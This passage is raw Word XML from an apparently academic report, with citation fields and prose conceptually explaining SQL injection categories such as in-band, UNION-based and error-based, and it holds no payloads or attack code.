      </w:r>
      <w:r w:rsidR="00B923C0">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1007/978-3-322-96372-7_6","abstract":"CSS (Cascading Style Sheet) adalah standard pembuatan dan pemakaian style untuk dokumen terstruktur , CSS digunakan untuk mempersingkat penulisan tag HTML seperti font,color,text, dan table menjadi lebih ringkas sehingga tidak terjadi pengulangan tulisan.","author":[{"dropping-particle":"","family":"Jänecke","given":"Michael","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Web-Programmierung","id":"ITEM-1","issued":{"date-parts":[["2003"]]},"title":"Cascading Style Sheets","type":"chapter"},"uris":["http://www.mendeley.com/documents/?uuid=6758a53c-73c0-4991-8273-3f10881ef537"]}],"mendeley":{"formattedCitation":"[89]","plainTextFormattedCitation":"[89]","previouslyFormattedCitation":"[89]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00B923C0">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B923C0" w:rsidRPr="00B923C0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[89]</w:t>
      </w:r>
      <w:r w:rsidR="00B923C0">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00C825E9">
        <w:t xml:space="preserve"> or SQL</w:t>
      </w:r>
      <w:r w:rsidR="00A07813">
        <w:t xml:space="preserve"> scripting </w:t>
      </w:r>
      <w:r w:rsidR="00E20D60">
        <w:t>languages</w:t>
      </w:r>
      <w:r w:rsidR="00A07813">
        <w:t xml:space="preserve"> to interface with the</w:t>
      </w:r>
      <w:r w:rsidR="00D838D1">
        <w:t xml:space="preserve"> frontend and</w:t>
      </w:r>
      <w:r w:rsidR="00A07813">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A07813" w:rsidRPr="00D838D1">
        <w:t xml:space="preserve">backend </w:t>
      </w:r>
      <w:r w:rsidR="00EC5D01">
        <w:t xml:space="preserve">SQL relationship </w:t>
      </w:r>
      <w:r w:rsidR="00A07813" w:rsidRPr="00D838D1">
        <w:t>databases</w:t>
      </w:r>
      <w:r w:rsidR="00D838D1">
        <w:t xml:space="preserve"> of a website</w:t>
      </w:r>
      <w:r w:rsidR="00B923C0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B923C0">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00B54627">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1145/1978915.1978919","ISSN":"01635808","abstract":"In this paper, we examine a number of SQL and socalled \"NoSQL\" data stores designed to scale simple OLTP-style application loads over many servers. Originally motivated by Web 2.0 applications, these systems are designed to scale to thousands or millions of users doing updates as well as reads, in contrast to traditional DBMSs and data warehouses. We contrast the new systems on their data model, consistency mechanisms, storage mechanisms, durability guarantees, availability, query support, and other dimensions. These systems typically sacrifice some of these dimensions, e.g. database-wide transaction consistency, in order to achieve others, e.g. higher availability and scalability.","author":[{"dropping-particle":"","family":"Cattell","given":"Rick","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"SIGMOD Record","id":"ITEM-1","issued":{"date-parts":[["2010"]]},"title":"Scalable SQL and NoSQL data stores","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=937d2a88-e4d6-44b8-a937-2d56cddd1087"]}],"mendeley":{"formattedCitation":"[90]","plainTextFormattedCitation":"[90]","previouslyFormattedCitation":"[90]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00B923C0">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B923C0" w:rsidRPr="00B923C0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[90]</w:t>
      </w:r>
      <w:r w:rsidR="00B923C0">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="005F7A64">
        <w:t>. The most common exploitation of inept programming</w:t>
      </w:r>
      <w:r w:rsidR="00A02496">
        <w:t xml:space="preserve"> within web development</w:t>
      </w:r>
      <w:r w:rsidR="005F7A64">
        <w:t xml:space="preserve"> are website form malicious code injections</w:t>
      </w:r>
      <w:r w:rsidR="00A02496">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="005F7A64">
        <w:t xml:space="preserve"> where</w:t>
      </w:r>
      <w:r w:rsidR="00A02496">
        <w:t>by</w:t>
      </w:r>
      <w:r w:rsidR="005F7A64">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="005F7A64">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">parameters of the query allow malicious code to be executed on the server from a remote client machine. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CEE4DD" w14:textId="3C3A2B42" w:rsidR="00D6587E" w:rsidRDefault="00D6587E" w:rsidP="00E20D60">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>There are two forms of this attack which are:</w:t>
      </w:r>
      <w:r w:rsidR="00B54627">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00B54627">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"This document discusses in detail the common 'SQL injection' technique, as it applies to the popular Microsoft Internet Information Server/Active Server Pages/SQL Server platform. It discusses the various ways in which SQL can be 'injected' into the application and addresses some of the data validation and database lockdown issues that are related to this class of attack. The paper is intended to be read by both developers of web applications which communicate with databases and by security professionals whose role includes auditing these web applications.","author":[{"dropping-particle":"","family":"Anley","given":"Chris","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"NGSSoftware Insight Security Research","id":"ITEM-1","issued":{"date-parts":[["2002"]]},"title":"Advanced SQL injection in SQL server applications","type":"book"},"uris":["http://www.mendeley.com/documents/?uuid=8437ece5-e188-4418-a357-cdd13830cf1d"]},{"id":"ITEM-2","itemData":{"DOI":"10.1093/itnow/bwi039","ISSN":"17465702","author":[{"dropping-particle":"","family":"Bisson","given":"Roger","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"ITNOW","id":"ITEM-2","issued":{"date-parts":[["2005"]]},"title":"SQL injection","type":"article"},"uris":["http://www.mendeley.com/documents/?uuid=50653997-86c1-45c3-9baf-5fa07590f91a"]}],"mendeley":{"formattedCitation":"[91], [92]","plainTextFormattedCitation":"[91], [92]","previouslyFormattedCitation":"[91], [92]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00B54627">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B54627" w:rsidRPr="00B54627">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[91], [92]</w:t>
      </w:r>
      <w:r w:rsidR="00B54627">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B54627">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00B54627">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"https://owasp.org/www-community/attacks/SQL_Injection","accessed":{"date-parts":[["2020","5","11"]]},"author":[{"dropping-particle":"","family":"OWASP","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"owasp.org","id":"ITEM-1","issued":{"date-parts":[["2020"]]},"page":"1-1","title":"SQL Injection | OWASP","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=9c3b926a-fe4b-3042-83a9-f53091f4f030"]}],"mendeley":{"formattedCitation":"[93]","plainTextFormattedCitation":"[93]","previouslyFormattedCitation":"[93]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00B54627">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B54627" w:rsidRPr="00B54627">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[93]</w:t>
      </w:r>
      <w:r w:rsidR="00B54627">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B54627">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030D48E8" w14:textId="00C2E47F" w:rsidR="002C1131" w:rsidRPr="00B54627" w:rsidRDefault="001172DC" w:rsidP="00AD7732">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B54627">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQL Injection (SQLi)</w:t>
      </w:r>
      <w:r w:rsidR="00D6587E" w:rsidRPr="00B54627">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">; - </w:t>
      </w:r>
      <w:r w:rsidR="00A02496" w:rsidRPr="00B54627">
        <w:t xml:space="preserve">This attack injects </w:t>
      </w:r>
      <w:r w:rsidR="00D6163B" w:rsidRPr="00B54627">
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="002C1131" w:rsidRPr="00B54627">
        <w:t>, JavaScript or PHP</w:t>
      </w:r>
      <w:r w:rsidR="00D6163B" w:rsidRPr="00B54627">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A02496" w:rsidRPr="00B54627">
        <w:t xml:space="preserve">code directly into the SQL database </w:t>
      </w:r>
      <w:r w:rsidR="00CE786E" w:rsidRPr="00B54627">
        <w:t>via</w:t>
      </w:r>
      <w:r w:rsidR="00A02496" w:rsidRPr="00B54627">
        <w:t xml:space="preserve"> a form query</w:t>
      </w:r>
      <w:r w:rsidR="005178F3" w:rsidRPr="00B54627">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00CE786E" w:rsidRPr="00B54627">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005178F3" w:rsidRPr="00B54627">
        <w:t>HTTP header or website cookie</w:t>
      </w:r>
      <w:r w:rsidR="00CE786E" w:rsidRPr="00B54627">
        <w:t xml:space="preserve"> injection</w:t>
      </w:r>
      <w:r w:rsidR="005178F3" w:rsidRPr="00B54627">
        <w:t xml:space="preserve"> where un-sanitised data validation</w:t>
      </w:r>
      <w:r w:rsidR="00790D56" w:rsidRPr="00B54627">
        <w:t xml:space="preserve"> rule</w:t>
      </w:r>
      <w:r w:rsidR="005178F3" w:rsidRPr="00B54627">
        <w:t xml:space="preserve"> has not been implemented</w:t>
      </w:r>
      <w:r w:rsidR="00CE786E" w:rsidRPr="00B54627">
        <w:t xml:space="preserve"> to verify if the inputted data fits the ; GET and POST parameters of the </w:t>
      </w:r>
      <w:r w:rsidR="00790D56" w:rsidRPr="00B54627">
        <w:t>database</w:t>
      </w:r>
      <w:r w:rsidR="00CE786E" w:rsidRPr="00B54627">
        <w:t>, which allows attackers to delete data and/or steal data stored within the backend database</w:t>
      </w:r>
      <w:r w:rsidR="001706CB" w:rsidRPr="00B54627">
        <w:t xml:space="preserve"> such as; customer and/or administrator login credentials, customer/business financial information, intellectual property etc. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF818B8" w14:textId="194CDD75" w:rsidR="002C1131" w:rsidRPr="00B54627" w:rsidRDefault="00CE786E" w:rsidP="00AD7732">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B54627">
        <w:t xml:space="preserve">According to OWASP the most common </w:t>
      </w:r>
      <w:r w:rsidR="001172DC" w:rsidRPr="00B54627">
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54627">
        <w:t xml:space="preserve"> attacks consist of 5 techniques</w:t>
      </w:r>
      <w:r w:rsidR="002C1131" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> which all focus on manipulating the databases validation rule website/database developer configuration errors within the website source code. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CFB9D4" w14:textId="4E394D55" w:rsidR="002C1131" w:rsidRPr="00B54627" w:rsidRDefault="002C1131" w:rsidP="00AD7732">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>These</w:t>
      </w:r>
      <w:r w:rsidR="001172DC" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> common techniques</w:t>
      </w:r>
      <w:r w:rsidR="001172DC" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> fall into 3 SQLi categories</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001172DC" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">which </w:t>
      </w:r>
      <w:r w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>are:</w:t>
      </w:r>
      <w:r w:rsidR="00CE786E" w:rsidRPr="00B54627">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBCAF93" w14:textId="77777777" w:rsidR="00633152" w:rsidRPr="00B54627" w:rsidRDefault="00A80A7B" w:rsidP="00A80A7B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>In-Band SQLi:</w:t>
      </w:r>
      <w:r w:rsidR="00E3671D" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E3671D" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>This category of SQLi exploitation is the most common due to the efficiency and simplicity of the attack</w:t>
      </w:r>
      <w:r w:rsidR="00633152" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> which can be defined as a reconnaissance/ information gathering attack about the backend database structure and potential backdoors or vulnerabilities that can be exploited to steal data</w:t>
      </w:r>
      <w:r w:rsidR="00E3671D" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFC88FD" w14:textId="137731C3" w:rsidR="00A80A7B" w:rsidRPr="00B54627" w:rsidRDefault="00E3671D" w:rsidP="00A80A7B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>In-Band SQLi utilises the same channel of communication to leverage the attack and gather the resulting data that consists of two methods which are;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705F0503" w14:textId="28F58849" w:rsidR="002C1131" w:rsidRPr="00B54627" w:rsidRDefault="002C1131" w:rsidP="00A80A7B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidR="00CE786E" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">nion </w:t>
      </w:r>
      <w:r w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="00CE786E" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>perator</w:t>
      </w:r>
      <w:r w:rsidR="00065288" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidR="00A80A7B" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00A80A7B" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>This</w:t>
      </w:r>
      <w:r w:rsidR="001172DC" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> technique is defined as an ‘In-band’ SQLi </w:t>
      </w:r>
      <w:r w:rsidR="00A80A7B" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>which manipulates</w:t>
      </w:r>
      <w:r w:rsidR="00C66A44" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> the UNION SQL operator, that binds </w:t>
      </w:r>
      <w:r w:rsidR="00A80A7B" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>several</w:t>
      </w:r>
      <w:r w:rsidR="00C66A44" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> query statements generated by the </w:t>
      </w:r>
      <w:r w:rsidR="00A80A7B" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">backend </w:t>
      </w:r>
      <w:r w:rsidR="00C66A44" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">database </w:t>
      </w:r>
      <w:r w:rsidR="00A80A7B" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>to receive a solitary HTTP response</w:t>
      </w:r>
      <w:r w:rsidR="00E3671D" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, that contain</w:t>
      </w:r>
      <w:r w:rsidR="00633152" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00E3671D" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> data </w:t>
      </w:r>
      <w:r w:rsidR="00633152" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">pertaining to the source code of the database and/or API. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B722B1" w14:textId="77777777" w:rsidR="00A80A7B" w:rsidRPr="00B54627" w:rsidRDefault="00A80A7B" w:rsidP="00A80A7B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B3484DB" w14:textId="44167DCC" w:rsidR="00A80A7B" w:rsidRPr="00B54627" w:rsidRDefault="00A80A7B" w:rsidP="00A80A7B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Error Based, -</w:t>
      </w:r>
      <w:r w:rsidR="00CD0642" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CD0642" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">This database reconnaissance attack is utilised for database enumeration, by inputting invalid search strings within a form, so that error messages are returned that reveal information about </w:t>
      </w:r>
      <w:r w:rsidR="005230B1" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00633152" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>databases parent structure</w:t>
      </w:r>
      <w:r w:rsidR="00CD0642" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="005230B1" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">the returned information can </w:t>
      </w:r>
      <w:r w:rsidR="00CD0642" w:rsidRPr="00B54627">
        <w:rPr>
